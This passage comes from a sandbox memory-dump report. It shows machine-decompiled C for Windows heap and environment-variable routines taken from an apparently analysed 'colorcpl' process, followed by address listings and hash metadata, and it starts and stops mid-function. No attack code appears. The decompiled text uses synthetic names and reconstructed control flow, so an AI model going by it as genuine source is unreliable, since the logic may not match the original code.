													if(_t322 != 6) {
														_t417 = _v44;
														_t323 = E04353AF6(_v44, _t550);
														__eflags = _t323;
														if(_t323 == 0) {
															L117:
															_t478 = 1;
															__eflags = 1;
															goto L118;
														} else {
															goto L98;
														}
														while(1) {
															L98:
															_t491 =  *(_t550 + 0x1c);
															__eflags = _t491;
															if(_t491 == 0) {
																goto L117;
															}
															__eflags = _t491 & 0x00000002;
															if((_t491 & 0x00000002) != 0) {
																goto L117;
															}
															_t417 = _t491 | 0x00000002;
															asm("lock cmpxchg [edi], ecx");
															_t521 = _v16;
															__eflags = _t491 - _t491;
															if(_t491 != _t491) {
																continue;
															}
															_t492 =  *_t550;
															_t430 = _t378;
															_v40 = _t492;
															_v36 = _t378;
															while(1) {
																_t154 = _t492 + 0x5e; // 0xf28b56ff
																_t494 = _t492 + (( *_t154 & 0x0000ffff) + _t430 & 0x0000000f) * 4 + 8;
																_v48 = _t494;
																_t328 =  *_t494;
																_v32 = _t328;
																__eflags = _t328;
																if(_t328 != 0) {
																	goto L105;
																}
																_t417 = _t550;
																asm("lock cmpxchg [edx], ecx");
																__eflags = _t328;
																if(_t328 == 0) {
																	goto L117;
																}
																L107:
																_t430 = _v36;
																L108:
																_t430 = _t430 + 1;
																_v36 = _t430;
																__eflags = _t430 - 0x10;
																if(_t430 >= 0x10) {
																	_t431 =  *_t550;
																	_t417 =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	L115:
																	_t177 = _t550 + 0x20; // 0x20
																	_t497 = _t177;
																	L116:
																	E043520E0(_t417, _t497);
																	goto L117;
																}
																_t492 = _v40;
																continue;
																L105:
																_t329 = _t328 + 0x1c;
																_v28 = _t329;
																_t478 = 1;
																_t330 =  *_t329;
																__eflags = 1 & _t330;
																if((1 & _t330) != 0) {
																	goto L108;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _v32 - _v32;
																if(_v32 == _v32) {
																	_t531 = 0xfffffffd;
																	_t335 =  *_v28;
																	do {
																		_t417 = _t335 & _t531;
																		__eflags = _t417;
																		asm("lock cmpxchg [esi], ecx");
																	} while (_t417 != 0);
																	_t521 = _v16;
																	__eflags = _t335 - 2;
																	if(_t335 != 2) {
																		goto L118;
																	}
																	_t498 = _v32;
																	_t417 =  *( *_t498);
																	 *_t498 = _t378;
																	_t497 = _t498 + 0x20;
																	goto L116;
																}
																goto L107;
															}
														}
														goto L117;
													}
													_t417 =  *( *_t550);
													 *_t550 = _t378;
													goto L115;
												}
												_t417 = _v36;
												__eflags = _t417 - _v44;
												if(_t417 < _v44) {
													goto L92;
												}
												_v36 = _t417 - _v44;
												_t417 =  *_t545;
												__eflags = _v36 -  *((intOrPtr*)(_t417 + 0x14));
												_t521 = _v16;
												if(_v36 <  *((intOrPtr*)(_t417 + 0x14))) {
													goto L127;
												}
												goto L92;
											}
											_t118 = _t521 + 8; // -16
											_t499 = E043CE9F6(_t118);
											__eflags = _t499;
											if(_t499 == 0) {
												L87:
												_t478 = 1;
												__eflags = 1;
												goto L88;
											}
											_t555 = _v32;
											do {
												_t437 =  *(_t499 - 4);
												_t499 =  *_t499;
												asm("btr [eax], edi");
												_t555 = _t555 + 1;
												_v36 = _t437 >> 0x00000008 & 0x0000ffff;
												__eflags = _t499;
											} while (_t499 != 0);
											_t521 = _v16;
											_t378 = 0;
											__eflags = 0;
											_v32 = _t555;
											_t542 = _v28;
											goto L87;
										}
										_t111 = _t518 + 8; // 0x8
										_t483 = _t111;
										_t409 = _v16 + 8;
										goto L81;
									}
									_t397 = _v44;
									L77:
									_t397 = _t397 + 1;
									_v44 = _t397;
									__eflags = _t397 - _v48;
									if(_t397 <= _v48) {
										_t274 = _v40;
										continue;
									}
									_t542 = _t541 | 0xffffffff;
									__eflags = _t542;
									_v28 = _t542;
									goto L79;
								}
							}
							_push(_t378);
							_push(_t378);
							_push(_t378);
							_push(_t518);
							_t442 = 3;
							E04405FED(_t442,  *((intOrPtr*)(_t396 + 0xc)));
							goto L64;
						}
						__eflags =  *(_t518 + 7) - _t378;
						if(__eflags >= 0) {
							__eflags =  *(_t535 + 0x4c) - _t378;
							if( *(_t535 + 0x4c) == _t378) {
								L34:
								_t344 = 1;
								L35:
								_v5 = _t344;
								_v6 = _t344;
								__eflags = _t344;
								if(_t344 == 0) {
									L29:
									_t504 = _v20;
									L30:
									_push(_t378);
									_push(_t378);
									_push(_t504);
									_push(_t518);
									_t443 = 3;
									E04405FED(_t443, _t535);
									__eflags = _v5 - _t378;
									if(_v5 == _t378) {
										goto L22;
									}
									L31:
									__eflags = _a4 & 0x3c000102;
									_t48 = _v20 - 8; // 0x4436d44
									_t444 = _t48;
									_v44 =  *_t444;
									if((_a4 & 0x3c000102) != 0) {
										goto L59;
									}
									__eflags = _t444[3] - 5;
									if(_t444[3] != 5) {
										_t445 = _t378;
									} else {
										_t51 =  &(_t444[3]); // 0x920a
										_t249 = _v20;
										_t445 = _t444 - (( *_t51 & 0x000000ff) << 3) + 8;
									}
									_t348 = E043E78DE(_v44, _t535, _t249, 3, _t445);
									__eflags = _t348;
									if(_t348 < 0) {
										goto L22;
									} else {
										_t249 = _v20;
										goto L59;
									}
								}
								__eflags =  *(_t518 + 7) - _t378;
								if( *(_t518 + 7) >= _t378) {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t351 =  *_t518 & 0x0000ffff;
									} else {
										_t359 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t359;
										if(( *(_t535 + 0x4c) & _t359) != 0) {
											_t359 = _t359 ^  *(_t535 + 0x50);
											__eflags = _t359;
										}
										_t351 = _t359 & 0x0000ffff;
									}
								} else {
									_t456 = _t518 >> 0x00000003 ^  *_t518 ^  *0x4436964 ^ _t535;
									__eflags = _t456;
									if(_t456 == 0) {
										_t361 = _t518 - (_t456 >> 0xd);
										__eflags = _t361;
										_t362 =  *_t361;
									} else {
										_t362 = _t378;
									}
									_t351 =  *((intOrPtr*)(_t362 + 0x14));
								}
								__eflags =  *(_t518 + 7) - 4;
								_t509 = _t351 & 0xffff;
								if( *(_t518 + 7) != 4) {
									_t449 = _t509 << 3;
									__eflags = _t449;
								} else {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t356 =  *_t518 & 0x0000ffff;
									} else {
										_t358 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t358;
										if(( *(_t535 + 0x4c) & _t358) != 0) {
											_t358 = _t358 ^  *(_t535 + 0x50);
											__eflags = _t358;
										}
										_t356 = _t358 & 0x0000ffff;
									}
									_t449 =  *((intOrPtr*)(_t518 - 8)) - (_t356 & 0x0000ffff) + _t509;
								}
								_t504 = _v20;
								_t353 = _t449 + _t518;
								__eflags = _t353 - _t504;
								asm("sbb al, al");
								_t355 =  !_t353 & _v6;
								__eflags = _t355;
								_v5 = _t355;
								if(_t355 != 0) {
									goto L31;
								} else {
									goto L30;
								}
							}
							_t363 =  *_t518;
							_t511 =  *(_t535 + 0x50) ^ _t363;
							_v68 = _t363;
							_v68 = _t511;
							__eflags = _t511 >> 0x18 - (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511);
							if(_t511 >> 0x18 == (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511)) {
								goto L34;
							}
							_v5 = _t378;
							goto L29;
						}
						_t344 = E04401F59(_t378, _t535, _t518, _t518, _t535, __eflags);
						goto L35;
					} else {
						L22:
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0436ABA0(0xc000000d);
						_t519 = _t378;
						goto L7;
					}
				} else {
					if(( *0x44338c0 & 0x00000002) != 0 && __edx != 0) {
						_t378 =  *(__edx - 8);
						_v20 = __edx - _t378;
					}
					_t370 = E043ED8D2(_a4);
					_t534 = _v20;
					_t372 = E044086A8(_t535, _v20, _t370 & 0x11000001, _a8, _a12);
					_v36 = _t372;
					if(_t372 != 0) {
						_t373 = _a8;
						__eflags = _t373;
						if(_t373 != 0) {
							 *_t373 =  *_t373 - _t378;
							__eflags =  *_t373;
						}
						_t374 = E04353C20(_t535);
						__eflags = _t374;
						if(_t374 != 0) {
							E043FE8B1(_t535, _t534);
						}
					} else {
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0436ABA0(0xc000000d);
					}
					_t519 = _v36;
					L7:
					return _t519;
				}
			}

0x04397184
0x04397186
0x04397188
0x0439718a
0x0439718e
0x04397191
0x0439719a
0x04397229
0x04397233
0x043978ef
0x043978f8
0x043978fd
0x04397900
0x04397902
0x00000000
0x00000000
0x04397908
0x04397908
0x0439790b
0x0439790d
0x0439790f
0x04397911
0x04397911
0x04397914
0x04397917
0x04397919
0x0439791b
0x0439791b
0x0439791f
0x04397924
0x04397926
0x0439792c
0x04397933
0x0439793e
0x0439793e
0x04397933
0x00000000
0x04397926
0x04397239
0x0439723d
0x0439724a
0x0439724c
0x04397278
0x04397279
0x0439727a
0x0439727b
0x04397280
0x04397281
0x0439724e
0x0439724e
0x04397251
0x04397255
0x0439725e
0x0439725e
0x0439725e
0x04397260
0x04397264
0x04397266
0x04397267
0x04397268
0x04397269
0x0439726e
0x0439726f
0x04397274
0x04397274
0x04397264
0x0439723f
0x04397246
0x04397246
0x04397286
0x04397288
0x043972b2
0x043972b5
0x043972b9
0x04397404
0x04397404
0x04397407
0x00000000
0x043978ec
0x0439741a
0x0439741c
0x0439741f
0x043978d9
0x043978d9
0x043978da
0x043978db
0x043978dc
0x043978e1
0x043978e2
0x0439748b
0x0439748d
0x00000000
0x0439748d
0x0439742c
0x0439742e
0x04397431
0x04397433
0x00000000
0x00000000
0x0439743c
0x04397442
0x04397447
0x0439744a
0x0439744d
0x04397452
0x0439745a
0x0439745f
0x04397475
0x04397477
0x04397493
0x04397498
0x0439749a
0x043974ac
0x0439749c
0x043974a5
0x043974a5
0x043974b3
0x043974b4
0x043974b6
0x043974b8
0x043974be
0x043974c4
0x043974c9
0x043974d1
0x043974d8
0x043974d8
0x043974d8
0x043974c4
0x043974d9
0x043974e0
0x043974e2
0x043974e5
0x043974ea
0x043974f0
0x043974f3
0x043974fb
0x043974fb
0x043974ff
0x04397502
0x04397505
0x0439750a
0x00000000
0x00000000
0x04397519
0x0439751d
0x04397520
0x04397522
0x04397536
0x04397536
0x0439753a
0x0439753d
0x04397555
0x0439755e
0x04397561
0x04397565
0x043975a2
0x043975b1
0x043975b3
0x043975b5
0x043975b9
0x043977f9
0x043977f9
0x043977fc
0x043977ff
0x04397801
0x04397488
0x04397488
0x00000000
0x04397488
0x0439780b
0x04397810
0x04397812
0x00000000
0x00000000
0x04397818
0x04397818
0x0439781b
0x0439781b
0x0439781d
0x0439781f
0x00000000
0x00000000
0x04397825
0x04397828
0x00000000
0x00000000
0x04397835
0x04397839
0x0439783b
0x00000000
0x00000000
0x0439783d
0x0439783f
0x04397841
0x04397844
0x04397850
0x04397853
0x04397855
0x04397858
0x0439785a
0x04397871
0x04397874
0x04397876
0x00000000
0x00000000
0x0439787f
0x04397883
0x04397886
0x04397888
0x043978b2
0x043978b6
0x043978b8
0x043978ba
0x043978bc
0x043978bc
0x043978c2
0x043978c5
0x00000000
0x00000000
0x043978cd
0x043978cf
0x043978d1
0x04397548
0x04397548
0x00000000
0x04397548
0x0439788a
0x0439788a
0x00000000
0x0439788a
0x04397863
0x04397867
0x04397869
0x00000000
0x00000000
0x00000000
0x0439788d
0x0439788d
0x0439788e
0x0439788e
0x0439789a
0x043978a5
0x043978a5
0x043978a8
0x00000000
0x043978a8
0x00000000
0x0439781b
0x043975c4
0x043975ca
0x043975cd
0x043975d0
0x043975d2
0x043975f3
0x043975f3
0x043975f7
0x043975fa
0x043975fd
0x043975fd
0x043975ff
0x04397601
0x04397714
0x04397714
0x0439771d
0x04397722
0x04397725
0x04397728
0x04397739
0x0439773c
0x0439774e
0x0439774f
0x0439774f
0x04397752
0x04397759
0x0439775e
0x0439775f
0x04397763
0x04397767
0x04397768
0x0439776a
0x0439776a
0x04397775
0x0439777b
0x04397780
0x04397784
0x0439778e
0x0439778e
0x04397791
0x04397794
0x04397794
0x04397797
0x04397797
0x04397797
0x04397797
0x04397799
0x0439779e
0x043977ab
0x043977b2
0x043977b4
0x043977b4
0x043977b9
0x043977b9
0x043977be
0x043977c1
0x043977c1
0x043977c6
0x043977c9
0x043977cf
0x043977d2
0x043977d5
0x043977d6
0x043977d8
0x043977da
0x043977dc
0x043977dc
0x043977e2
0x043977e5
0x00000000
0x00000000
0x043977ed
0x043977ed
0x043977f0
0x043977f2
0x00000000
0x043977f2
0x04397609
0x0439760c
0x0439760d
0x0439760f
0x04397611
0x04397613
0x04397613
0x04397619
0x0439761c
0x0439761f
0x0439762c
0x04397631
0x04397636
0x04397638
0x04397711
0x04397713
0x04397713
0x00000000
0x00000000
0x00000000
0x00000000
0x0439763e
0x0439763e
0x0439763e
0x04397641
0x04397643
0x00000000
0x00000000
0x04397649
0x0439764c
0x00000000
0x00000000
0x04397657
0x0439765c
0x04397660
0x04397663
0x04397665
0x00000000
0x00000000
0x04397667
0x04397669
0x0439766b
0x0439766e
0x04397671
0x04397671
0x0439767d
0x04397680
0x04397683
0x04397685
0x04397688
0x0439768a
0x00000000
0x00000000
0x0439768c
0x0439768e
0x04397692
0x04397694
0x00000000
0x00000000
0x043976bb
0x043976bb
0x043976be
0x043976be
0x043976bf
0x043976c2
0x043976c5
0x043976f4
0x04397706
0x04397706
0x04397709
0x04397709
0x04397709
0x0439770c
0x0439770c
0x00000000
0x0439770c
0x043976c7
0x00000000
0x04397698
0x04397698
0x0439769d
0x043976a0
0x043976a1
0x043976a3
0x043976a5
0x00000000
0x00000000
0x043976af
0x043976b3
0x043976b6
0x043976b9
0x043976d1
0x043976d2
0x043976d4
0x043976d6
0x043976d6
0x043976d8
0x043976d8
0x043976de
0x043976e1
0x043976e4
0x00000000
0x00000000
0x043976e6
0x043976eb
0x043976ed
0x043976ef
0x00000000
0x043976ef
0x00000000
0x043976b9
0x04397671
0x00000000
0x0439763e
0x04397623
0x04397625
0x00000000
0x04397625
0x043975d4
0x043975d7
0x043975da
0x00000000
0x00000000
0x043975df
0x043975e2
0x043975e7
0x043975ea
0x043975ed
0x00000000
0x00000000
0x00000000
0x043975ed
0x04397567
0x0439756f
0x04397571
0x04397573
0x0439759f
0x043975a1
0x043975a1
0x00000000
0x043975a1
0x04397578
0x0439757b
0x0439757b
0x04397581
0x04397589
0x0439758c
0x0439758d
0x04397590
0x04397590
0x04397594
0x04397597
0x04397597
0x04397599
0x0439759c
0x00000000
0x0439759c
0x04397542
0x04397542
0x04397545
0x00000000
0x04397545
0x04397524
0x04397527
0x04397527
0x04397528
0x0439752b
0x0439752e
0x043974f8
0x00000000
0x043974f8
0x04397530
0x04397530
0x04397533
0x00000000
0x04397533
0x043974fb
0x0439747c
0x0439747d
0x0439747e
0x0439747f
0x04397482
0x04397483
0x00000000
0x04397483
0x043972bf
0x043972c2
0x043972cf
0x043972d2
0x04397349
0x04397349
0x0439734b
0x0439734b
0x0439734e
0x04397351
0x04397353
0x043972f9
0x043972f9
0x043972fc
0x043972fc
0x043972fd
0x043972fe
0x043972ff
0x04397304
0x04397305
0x0439730a
0x0439730d
0x00000000
0x00000000
0x04397313
0x04397313
0x0439731d
0x0439731d
0x04397322
0x04397325
0x00000000
0x00000000
0x0439732b
0x0439732f
0x043973e9
0x04397335
0x04397335
0x0439733e
0x04397341
0x04397341
0x043973f4
0x043973f9
0x043973fb
0x00000000
0x04397401
0x04397401
0x00000000
0x04397401
0x043973fb
0x04397355
0x04397358
0x04397381
0x04397384
0x04397395
0x04397386
0x04397386
0x04397388
0x0439738b
0x0439738d
0x0439738d
0x0439738d
0x04397390
0x04397390
0x0439735a
0x04397367
0x04397369
0x0439736c
0x04397377
0x04397377
0x04397379
0x0439736e
0x0439736e
0x0439736e
0x0439737b
0x0439737b
0x04397398
0x0439739f
0x043973a2
0x043973c9
0x043973c9
0x043973a4
0x043973a4
0x043973a7
0x043973b8
0x043973a9
0x043973a9
0x043973ab
0x043973ae
0x043973b0
0x043973b0
0x043973b0
0x043973b3
0x043973b3
0x043973c3
0x043973c3
0x043973cc
0x043973cf
0x043973d2
0x043973d4
0x043973d8
0x043973d8
0x043973db
0x043973de
0x00000000
0x043973e4
0x00000000
0x043973e4
0x043973de
0x043972d4
0x043972d9
0x043972db
0x043972e0
0x043972f2
0x043972f4
0x00000000
0x00000000
0x043972f6
0x00000000
0x043972f6
0x043972c8
0x00000000
0x0439728a
0x0439728a
0x0439729d
0x043972a8
0x043972ab
0x00000000
0x043972ab
0x043971a0
0x043971a7
0x043971ad
0x043971b2
0x043971b2
0x043971be
0x043971c3
0x043971d0
0x043971d5
0x043971da
0x0439720a
0x0439720d
0x0439720f
0x04397211
0x04397211
0x04397211
0x04397215
0x0439721a
0x0439721c
0x04397222
0x04397222
0x043971dc
0x043971f0
0x043971fb
0x043971fb
0x043971fe
0x04397201
0x04397207
0x04397207

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7836f592472891362e5bfb38c233092687f1d026126887961f0394fe8451ba
Instruction ID: 42f9b1b11bf4efed190f1d7756450e44a10c51666e73107cf81f28b8e7125612
Opcode Fuzzy Hash: fc7836f592472891362e5bfb38c233092687f1d026126887961f0394fe8451ba
Instruction Fuzzy Hash: E1426B71A10616DFDF18CF59C890AAEB7F6FF88314B249569D852AB390D734BC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0436B1E0 Relevance: .6, Instructions: 629
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E0436B1E0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				char _v20;
				signed int _v29;
				char _v30;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __ebp;
				signed int _t232;
				intOrPtr _t235;
				signed int _t236;
				signed int _t241;
				short* _t255;
				short* _t259;
				short* _t260;
				signed int _t261;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t282;
				void* _t284;
				signed int _t299;
				intOrPtr _t311;
				intOrPtr _t319;
				signed int _t322;
				signed int _t324;
				signed int _t327;
				signed short* _t334;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				intOrPtr _t344;
				signed int _t346;
				signed int _t350;
				signed int _t355;
				signed int _t356;
				intOrPtr _t357;
				signed int _t359;
				short* _t361;
				void* _t362;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				signed short _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t388;
				signed int _t389;
				void* _t390;
				signed int _t392;
				intOrPtr _t397;
				signed int _t400;
				short* _t401;
				signed int _t402;
				short* _t403;
				signed int _t406;
				signed int _t408;
				void* _t409;
				signed int _t414;
				signed int _t415;
				void* _t416;
				void* _t417;
				signed int _t418;
				void* _t420;
				void* _t422;
				signed int _t424;
				signed int _t425;
				intOrPtr _t427;
				void* _t428;
				void* _t432;
				void* _t435;
				void* _t437;
				signed short _t438;
				intOrPtr _t441;
				signed int _t442;
				void* _t443;
				void* _t444;
				void* _t446;

				_push(0xfffffffe);
				_push(0x441c5a8);
				_push(E0438AD20);
				_push( *[fs:0x0]);
				_t444 = _t443 - 0x54;
				_t232 =  *0x443b370;
				_v12 = _v12 ^ _t232;
				_push(_t232 ^ _t442);
				 *[fs:0x0] =  &_v20;
				_v56 = 0;
				_v84 = 0;
				_v29 = 0;
				_v30 = 0;
				_t389 = _a12;
				if(_t389 == 0) {
					L120:
					_t235 = 0xc000000d;
					L66:
					 *[fs:0x0] = _v20;
					return _t235;
				}
				_t339 = _a8;
				if( *_t339 == 0) {
					goto L120;
				} else {
					_t236 = 1;
					while(_t236 < _t389) {
						_t388 =  *(_t339 + _t236 * 2) & 0x0000ffff;
						if(_t388 == 0 || _t388 == 0x3d) {
							goto L120;
						} else {
							_t236 = _t236 + 1;
							_t339 = _a8;
							continue;
						}
					}
					_t340 = _a16;
					__eflags = _t340;
					if(_t340 == 0) {
						L12:
						_t238 =  *( *[fs:0x18] + 0x30);
						_t327 =  *((intOrPtr*)(_t238 + 0x10));
						_v48 = _t327;
						_v100 = _t327;
						_v68 = 0;
						_t414 = 0;
						_v44 = 0;
						_t341 = _a4;
						__eflags = _t341;
						if(_t341 != 0) {
							_t342 =  *_t341;
							_v36 = _t342;
							__eflags =  *(_t327 + 0x48) - _t342;
							if( *(_t327 + 0x48) != _t342) {
								goto L14;
							}
							_t238 =  *(_t238 + 0x1c);
							__eflags = _t238;
							if(_t238 == 0) {
								L104:
								_v29 = 1;
								goto L14;
							} else {
								_t238 = E04362180(_t238);
								_t342 = _v36;
								__eflags = _t238;
								if(_t238 == 0) {
									goto L14;
								}
								goto L104;
							}
						} else {
							_v30 = 1;
							_v29 = 1;
							_t238 = E0434FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t342 =  *(_t327 + 0x48);
							_v36 = _t342;
							_t414 = _v44;
							L14:
							_v8 = 0;
							_t400 = _t342;
							_v40 = _t400;
							_t328 = 0;
							_v52 = 0;
							__eflags = _t342;
							if(_t342 == 0) {
								L61:
								__eflags = _t414;
								if(_t414 != 0) {
									_t400 = _t414;
									_v40 = _t400;
								}
								__eflags = _t328;
								if(_t328 == 0) {
									__eflags = _a16;
									if(_a16 == 0) {
										goto L63;
									}
									__eflags = _t400;
									if(_t400 == 0) {
										_t415 = _a12;
										_t344 = _a20;
										_t241 = 6 + (_t415 + _t344) * 2;
										_t390 = 0;
										L75:
										_v60 = _t241;
										__eflags = _t241 - _t390;
										if(_t241 < _t390) {
											_t164 = _t344 + 2; // 0x2
											E04388C00(_t400 + (_t164 + _t415) * 2, _t400, _t328 - _t400 & 0xfffffffe);
											_t416 = _t415 + _t415;
											E043888C0(_t400, _a8, _t416);
											_t446 = _t444 + 0x18;
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												E04388F40(0x44363a0, 0, 0x234);
												_t446 = _t446 + 0xc;
											}
											_t401 = _t400 + _t416;
											_v40 = _t401;
											 *_t401 = 0x3d;
											_t402 = _t401 + 2;
											_v40 = _t402;
											_t417 = _a20 + _a20;
											E043888C0(_t402, _a16, _t417);
											_t403 = _t402 + _t417;
											_v40 = _t403;
											_t238 = 0;
											 *_t403 = 0;
											_v40 = _t403 + 2;
											__eflags = _a4;
											if(_a4 != 0) {
												goto L64;
											} else {
												_t343 = _v48;
												 *((intOrPtr*)(_t343 + 0x48)) = _v36;
												_t238 = _v60;
												 *((intOrPtr*)(_t343 + 0x290)) = _v60;
												 *((intOrPtr*)(_t343 + 0x294)) =  *((intOrPtr*)(_t343 + 0x294)) + 1;
												goto L65;
											}
										}
										_t346 = E0436B9FA(_t241);
										_v64 = _t346;
										__eflags = _t346;
										if(_t346 == 0) {
											L111:
											_v68 = 0xc000009a;
											goto L63;
										}
										__eflags = _t400;
										if(_t400 == 0) {
											_t418 = 0;
										} else {
											_t424 = _t400 - _v36;
											__eflags = _t424;
											_t418 = _t424 >> 1;
											E043888C0(_t346, _v36, _t418 + _t418);
											_t444 = _t444 + 0xc;
											_t346 = _v64;
										}
										_v80 = _t346 + _t418 * 2;
										_t420 = _a12 + _a12;
										E043888C0(_t346 + _t418 * 2, _a8, _t420);
										_t255 = _v80 + _t420;
										 *_t255 = 0x3d;
										_v80 = _t255 + 2;
										_t422 = _a20 + _a20;
										E043888C0(_t255 + 2, _a16, _t422);
										_t259 = _v80 + _t422;
										 *_t259 = 0;
										_t260 = _t259 + 2;
										__eflags = _t400;
										if(_t400 == 0) {
											 *_t260 = 0;
											_t329 = _v29;
										} else {
											E043888C0(_t260, _t400, _t328 - _t400 & 0xfffffffe);
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												E04388F40(0x44363a0, 0, 0x234);
											}
										}
										_t350 = _a4;
										_t261 = _v64;
										__eflags = _t350;
										if(_t350 != 0) {
											 *_t350 = _t261;
										} else {
											_t350 = _v48;
											 *((intOrPtr*)(_t350 + 0x48)) = _t261;
											 *((intOrPtr*)(_t350 + 0x290)) = _v60;
											_t148 = _t350 + 0x294;
											 *_t148 =  *(_t350 + 0x294) + 1;
											__eflags =  *_t148;
										}
										__eflags = _v30;
										if(_v30 != 0) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E0434E740(_t350);
											_v30 = 0;
										}
										_t238 = E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
										goto L64;
									}
									_v52 = _t400;
									while(1) {
										L70:
										_t270 =  *_t400 & 0x0000ffff;
										__eflags = _t270;
										if(_t270 == 0) {
											break;
										}
										while(1) {
											_t400 = _t400 + 2;
											_v52 = _t400;
											__eflags = _t270;
											if(_t270 == 0) {
												goto L70;
											}
											_t270 =  *_t400 & 0x0000ffff;
										}
									}
									_v52 = _t400 + 2;
									_t390 = E0436B870(_t342,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t342);
									_t328 = _v52;
									_t415 = _a12;
									_t355 = (_v52 - _v36 >> 1) + _t415 + _a20;
									__eflags = _t355;
									_t241 = 4 + _t355 * 2;
									_t400 = _v40;
									_t344 = _a20;
									goto L75;
								} else {
									L63:
									_t329 = _v29;
									L64:
									_t343 = _v48;
									L65:
									_v8 = 0xfffffffe;
									E0436B839(_t238, _t329, _t343);
									_t235 = _v68;
									goto L66;
								}
							}
							_t238 = _v84;
							_v80 = _v84;
							while(1) {
								L16:
								__eflags =  *_t400 - _t328;
								if( *_t400 == _t328) {
									break;
								}
								_t392 = _t400;
								_v92 = _t392;
								_t425 = 0;
								__eflags = 0;
								_v88 = 0;
								while(1) {
									_t400 = _t400 + 2;
									_v40 = _t400;
									_t273 =  *_t400 & 0x0000ffff;
									__eflags = _t273;
									if(_t273 == 0) {
										break;
									}
									__eflags = _t273 - 0x3d;
									if(_t273 != 0x3d) {
										continue;
									}
									_t425 = _t400 - _t392 >> 1;
									_v88 = _t425;
									_t400 = _t400 + 2;
									__eflags = _t400;
									_v40 = _t400;
									_t322 = _t400;
									_v56 = _t322;
									while(1) {
										__eflags =  *_t400 - _t328;
										if( *_t400 == _t328) {
											break;
										}
										_t400 = _t400 + 2;
										_v40 = _t400;
									}
									_t374 = _t400 - _t322;
									__eflags = _t374;
									_t375 = _t374 >> 1;
									_v80 = _t375;
									_v84 = _t375;
									break;
								}
								_t400 = _t400 + 2;
								_v40 = _t400;
								_t238 = _a8;
								_v72 = _t238;
								_v76 = _t392;
								_t356 = _a12;
								__eflags = _t356 - _t425;
								if(_t356 > _t425) {
									_t356 = _t425;
								}
								_t357 = _t238 + _t356 * 2;
								_v96 = _t357;
								while(1) {
									__eflags = _t238 - _t357;
									if(_t238 >= _t357) {
										break;
									}
									_v60 =  *_t238 & 0x0000ffff;
									_v64 =  *_t392 & 0x0000ffff;
									_t378 = _v60;
									_v32 = _t378;
									_t438 = _v64;
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										L37:
										_t238 = _t238 + 2;
										_v72 = _t238;
										_t392 = _t392 + 2;
										_v76 = _t392;
										_t357 = _v96;
										continue;
									}
									__eflags = _t378 - 0x61;
									if(_t378 >= 0x61) {
										__eflags = _t378 - 0x7a;
										if(_t378 > 0x7a) {
											__eflags =  *0x4436914 - _t328; // 0x7fab0654
											if(__eflags == 0) {
												goto L30;
											}
											_v60 = 0xc0;
											__eflags = _t378 - _v60;
											if(_t378 < _v60) {
												goto L30;
											}
											_t384 =  *0x4436914; // 0x7fab0654
											_t319 =  *0x4436914; // 0x7fab0654
											_t397 =  *0x4436914; // 0x7fab0654
											_t378 = _v32 +  *((intOrPtr*)(_t397 + (( *(_t319 + (( *(_t384 + ((_t378 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t378 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t378 & 0xf)) * 2));
											_t238 = _v72;
											_t392 = _v76;
											L42:
											_v32 = _t378;
											goto L30;
										}
										_t66 =  &_v60;
										 *_t66 = _v60 + 0xffe0;
										__eflags =  *_t66;
										_t378 = _v60;
										goto L42;
									}
									L30:
									__eflags = _t438 - 0x61;
									if(_t438 >= 0x61) {
										__eflags = _t438 - 0x7a;
										if(_t438 > 0x7a) {
											__eflags =  *0x4436914 - _t328; // 0x7fab0654
											if(__eflags != 0) {
												_v64 = 0xc0;
												__eflags = _t438 - _v64;
												if(_t438 >= _v64) {
